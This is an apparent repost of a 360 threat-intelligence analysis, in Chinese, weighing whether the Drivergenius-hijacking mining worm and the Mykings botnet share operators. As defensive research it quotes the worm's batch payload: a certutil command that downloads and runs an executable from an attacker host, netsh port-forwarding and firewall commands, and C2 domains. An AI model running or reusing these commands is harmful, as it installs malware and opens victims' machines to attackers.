同一团伙还是栽赃嫁祸？ - “驱动人生”劫持事件与Mykings家族活动的关联分析

背景

近期360威胁情报中心发现劫持“驱动人生”的挖矿蠕虫再次活跃并做出了预警（详情可以参见《各大安全厂商曝光该攻击，攻击逐步停止。

2018年12月27日

永恒之蓝攻击模块攻击成功后在目标机器上运行的bat的内容变更下一阶段的payload地址

从http://dl.haqo.net/dl.exe改成了http://dl.haqo.net/dll.exe；

     certutil-urlcache -split -f http://dl.haqo.net/dll.exec:\installs.exe

netshinterface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1connectport=53

netshfirewall add portopening tcp 65532 DNS2

c:\windows\temp\cm.exe/c c:\installs.exe

taskkill/F /IM cmd.exe

而该地址下载回来的样本（f9144118127ff29d4a49a30b242ceb55）的C2地址为以下3个，增加了http://img.minicen.ga/i.png，而该域名为免费域名，注册地址为：freenom.com

2019年1月23日

http://dl.haqo.net/dll.exe的地址的样本变为：

59b18d6146a2aa066f661599c496090d，下图为该样本的传播量：

   该样本的C2地址变为下图的3个域名，增加了o.beahh.com：

   其中 beahh.com域名是2019年1月16日刚注册的。

总结

         360威胁情报中心基于自有的大数据和威胁情报平台对入侵驱动人生的幕后团伙进行了关联分析，发现其所用的IP与Mykings事件团伙的部分IP重合，并且使用时间的段重合，甚至连样本所访问的URL格式、端口都一样。但是两个团伙已知的恶意代码没有太多的相似之处，格式高度一致的URL没有实际上的请求和响应数据，由于VT不可靠的URL检测机制，该URL是否实际存在也是个疑问。

基于看到的事实，有两个猜想值得关注：1、入侵“驱动人生”的幕后黑手与Mykings事件团伙存在联系，甚至可能是同一个团伙。2、“驱动人生”木马的团伙在有意识地积极栽赃嫁祸给Mykings团伙。我们的观点倾向于后者，360威胁情报中心会持续保持跟踪，基于新发现的事实调整自己的看法，也希望安全业界分享自己的发现。

参考

360对劫持“驱动人生”的挖矿蠕虫分析报告系列详情如下表：

• https://cert.360.cn/warning/detail?id=57cc079bc4686dd09981bf034130f1c9

• https://ti.360.net/blog/articles/an-attack-of-supply-chain-by-qudongrensheng/

• https://weibo.com/ttarticle/p/show?id=2309404318990783612243

• https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&mid=2247486576&idx=1&sn=dc5ff6a05fac06608365823173d17dae&chksm=ea65fb07dd1272113e4890dd284d19e945b4e0ae803f75671ee46cb3fbd42c54fa9170caac86&scene=0&xtrack=1#rd

• https://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/

转载请注明来自网盾网络安全培训，本文标题：《同一团伙还是栽赃嫁祸？ - “驱动人生”劫持事件与Mykings家族活动的关联分析》

标签：MyKings驱动人生